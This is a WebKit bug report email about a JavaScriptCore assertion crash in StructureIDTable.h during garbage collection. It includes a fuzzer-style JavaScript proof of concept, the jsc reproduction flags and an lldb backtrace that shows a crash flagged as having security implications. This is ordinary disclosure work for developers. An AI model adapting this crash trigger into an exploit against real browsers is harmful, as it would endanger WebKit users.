[Webkit-unassigned] [Bug 231136] New: Assertion error in StructureIDTable.h

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Sun Oct 3 05:14:47 PDT 2021 

https://bugs.webkit.org/show_bug.cgi?id=231136

            Bug ID: 231136
           Summary: Assertion error in StructureIDTable.h
           Product: WebKit
           Version: WebKit Local Build
          Hardware: Unspecified
                OS: Unspecified
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: JavaScriptCore
          Assignee: webkit-unassigned at lists.webkit.org
          Reporter: pangbin2415 at gmail.com

PoC:

```
function main() {
const v3 = [-4294967295,-262158.0803324459];
const v4 = [];
function v5(v6,v7) {
    const v9 = [2.2250738585072014e-308,2.2250738585072014e-308,2.2250738585072014e-308,2.2250738585072014e-308];
    const v12 = 0 < 100000;
    const v15 = v7["push"](v12,v3,v3,v9);
    const v16 = Array(100000);
}
const v17 = v5("xbCBcbd368",v3);
for (let v21 = 0; v21 < 100; v21++) {
    const v22 = v5("xbCBcbd368",v4);
}
gc();
}
noDFG(main);
noFTL(main);
main();
```

How to reproduce:
```
jsc --validateOptions=true --useConcurrentJIT=false --useConcurrentGC=false --thresholdForJITSoon=10 --thresholdForJITAfterWarmUp=10 --thresholdForOptimizeAfterWarmUp=100 --thresholdForOptimizeAfterLongWarmUp=100 --thresholdForOptimizeSoon=100 --thresholdForFTLOptimizeAfterWarmUp=1000 --thresholdForFTLOptimizeSoon=1000 --validateBCE=true ./poc.js
```

Backtrace:
```
(lldb) bt 20
* thread #1, name = 'jsc', stop reason = signal SIGABRT
  * frame #0: 0x00007ffff46b4fb7 libc.so.6`__GI_raise(sig=<unavailable>) at raise.c:51
    frame #1: 0x00007ffff46b6921 libc.so.6`__GI_abort at abort.c:79
    frame #2: 0x000000000504825b jsc`::WTFCrashWithSecurityImplication() at Assertions.cpp:342:5
    frame #3: 0x000000000224adb3 jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::StructureIDTable::get(this=<unavailable>, structureID=<unavailable>) at StructureIDTable.h:181:5
    frame #4: 0x000000000224ad8a jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::VM::getStructure(this=<unavailable>, id=<unavailable>) at VM.h:928
    frame #5: 0x000000000224ad8a jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::JSCell::structure(this=<unavailable>, vm=<unavailable>) const at JSCellInlines.h:141
    frame #6: 0x000000000224ad8a jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::JSCell::structure() const at JSCellInlines.h:136
    frame #7: 0x000000000224ad8a jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::validate(cell=<unavailable>) at SlotVisitor.cpp:53
    frame #8: 0x000000000224a737 jsc`JSC::SlotVisitor::appendHiddenSlowImpl(this=<unavailable>, cell=0x000062d000127990, dependency=(m_value = 0)) at SlotVisitor.cpp:243
    frame #9: 0x000000000316d9a7 jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&) [inlined] JSC::SlotVisitor::appendHiddenUnbarriered(this=<unavailable>) at SlotVisitorInlines.h:76:9
    frame #10: 0x000000000316d98f jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&) [inlined] void JSC::SlotVisitor::appendHidden<JSC::Unknown, WTF::RawValueTraits<JSC::Unknown> >(JSC::WriteBarrierBase<JSC::Unknown, WTF::RawValueTraits<JSC::Unknown> > const&) at SlotVisitorInlines.h:116
    frame #11: 0x000000000316d98f jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&) at SlotVisitorInlines.h:135
    frame #12: 0x000000000316d917 jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&) [inlined] JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&)::'lambda'(unsigned char)::operator()(unsigned char) const at JSObject.cpp:127
    frame #13: 0x000000000316d88a jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(this=<unavailable>, visitor=<unavailable>) at JSObject.cpp:145
    frame #14: 0x0000000003153ac3 jsc`void JSC::JSObject::visitChildrenImpl<JSC::SlotVisitor>(JSC::JSCell*, JSC::SlotVisitor&) [inlined] JSC::Structure* JSC::JSObject::visitButterfly<JSC::SlotVisitor>(visitor=<unavailable>) at JSObject.cpp:108:25
    frame #15: 0x0000000003153ab6 jsc`void JSC::JSObject::visitChildrenImpl<JSC::SlotVisitor>(cell=<unavailable>, visitor=0x00006110000002c0) at JSObject.cpp:424
    frame #16: 0x000000000224be77 jsc`JSC::SlotVisitor::visitChildren(this=0x00006110000002c0, cell=0x000060c00000a2a8) at SlotVisitor.cpp:379:9
    frame #17: 0x000000000223d0ae jsc`JSC::SlotVisitor::drain(WTF::MonotonicTime) at SlotVisitor.cpp:506:21
    frame #18: 0x000000000223cebb jsc`JSC::SlotVisitor::drain(WTF::MonotonicTime) [inlined] JSC::IterationStatus JSC::SlotVisitor::forEachMarkStack<JSC::SlotVisitor::drain(WTF::MonotonicTime)::$_3>(this=<unavailable>)::$_3 const&) at SlotVisitorInlines.h:174
    frame #19: 0x000000000223cebb jsc`JSC::SlotVisitor::drain(this=0x00006110000002c0, timeout=(m_value = +Inf)) at SlotVisitor.cpp:496
```

Version: commit c39a585f82d27f39a87ead44e27d8bed65e9f24e

-- 
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-unassigned/attachments/20211003/aa8ff473/attachment.htm>

More information about the webkit-unassigned mailing list